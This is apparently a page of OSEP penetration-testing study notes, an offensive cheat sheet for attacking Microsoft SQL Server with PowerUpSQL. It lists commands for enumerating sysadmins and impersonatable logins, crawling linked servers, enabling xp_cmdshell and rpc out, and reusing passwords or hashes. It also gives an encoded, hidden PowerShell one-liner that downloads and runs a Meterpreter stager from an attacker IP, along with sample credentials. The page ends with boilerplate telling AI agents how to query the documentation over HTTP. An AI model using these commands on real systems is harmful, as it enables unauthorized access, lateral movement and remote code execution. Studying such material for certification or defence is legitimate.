# SQL Server Instance * Instance ``` get-sqlinstancelocal get-sqlinstancedomain Get-SQLConnectionTest -Instance "srv-1.red.com,1433" ``` * Server Info ``` get-sqlserverinfo -instance "redsql\sqlexpress" ``` * Privilege Enumeration Sysadmin logins/users ``` Get-SQLQuery -Instance 'red.com,1433' -query "select name from master..syslogins where sysadmin=1;" ``` User/Login can be impersonated ``` Get-SQLQuery -Instance 'red.com,1433' -query "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';" ``` * Linked Servers Not all users can see all links ``` select * from master..sysservers; (SQL Query) exec sp_linkedservers; (SQL Query) get-sqlserverlinkcrawl -instance "cywebdw\sqlexpress" -username webapp11 -password 89543dfGDFGH4d (PowerUpSQL Query) get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery(""m3sqlw.red.local"",'select * from master..sysservers')" (PowerUpSQL Open Query) ``` * Value of xp\_cmdshell ``` select * from sys.configurations where name='xp_cmdshell' (SQL Query) get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from sys.configurations where name ='xp_cmdshell'" (PowerUpSQL Query) get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery (""m3sqlw.red.local"",'select * from sys.configurations where name=''xp_cmdshell''')" (PowerUpSQL OpenQuery) ``` * Enable xp\_cmdshell ``` EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; exec xp_cmdshell 'whoami'; (SQL Query) get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;EXEC master.dbo.xp_cmdshell 'whoami';" (PowerUpSQL Query) get-sqlquery -instance "web06\sqlexpress" -query "exec ('sp_configure ''show advanced options'', 1; reconfigure; exec sp_configure ''xp_cmdshell'', 1; reconfigure;') AT sql03; exec('xp_cmdshell ''hostname'';') at SQL03" -username sa -password Passw0rd (1 hop PowerUpSQL Query) ``` * xp\_cmdshell Meterpreter Shell ``` echo -en 'IEX ((new-object net.webclient).downloadstring("http://10.10.14.111/runner64.txt"))' | iconv -t UTF-16LE | base64 -w 0 (Encode Payload) exec xp_cmdshell 'powershell -w hidden -enc <...>' (SQL Query) Invoke-SQLOSCmd -Instance "CYWEBDW\SQLEXPRESS" -Command "powershell -w hidden -enc <...> " -RawResults (PowerUpSQL Query 1) get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' ) " (PowerUpSQL Query 2) get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' )AT [m3sqlw.red.local]" (1 hop PowerUpSQL query) ``` * Enable Rpcout ``` execute as login='sa'; exec sp_serveroption 'sql03', 'rpc out', 'true'; (SQL Query) get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec sp_serveroption 'm3sqlw.red.local', 'rpc out', 'true'" (PowerUpSQL Query) get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec (sp_serveroption 'm3sqlw.red.local', 'rpc out', 'true') at [m3sqlw.red.local]" (PowerUpSQL Open Query) ``` #### Privilege Escalation is not necessary to be done immediately DA or some specific domain users have admin privilege over current host #### Password/Hash reuse Similar machines could share the same password/hash SQL01 and SQL02 SQL01 and File01 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://steffinstanly.gitbook.io/osep-notes/osep/local-reconnaissance-windows/sql-server-instance.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.